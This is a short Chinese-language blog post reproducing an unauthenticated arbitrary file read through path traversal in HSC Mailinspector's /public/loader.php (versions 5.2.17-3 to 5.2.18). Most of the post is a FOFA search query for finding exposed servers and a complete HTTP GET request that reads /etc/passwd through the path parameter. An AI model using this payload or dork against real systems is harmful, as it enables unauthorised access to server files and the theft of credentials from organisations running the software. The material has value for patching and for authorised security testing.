Babing
Published on 2024-08-30 / 1 Visits
0
0

H35-1HSC-Mailinspector-任意文件读取

H35-1HSC-Mailinspector-任意文件读取

漏洞描述:

由于HSC Mailinspector /public/loader.php文件中存在的路径遍历漏洞,path参数无法正确筛选传递的文件和目录是否为webroot的一部分,从而使未经身份验证的攻击者能够读取服务器上的任意文件,造成信息泄露,使系统处于极不安全的状态。

影响版本:

HSC Mailinspector 5.2.17-3 through 5.2.18

网站图片:

image-20240630185235625

fofa语法:

body=“mailinspector/public”

漏洞复现:

payload:

GET /mailinspector/public/loader.php?path=./././/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

效果图:
效果图


Comment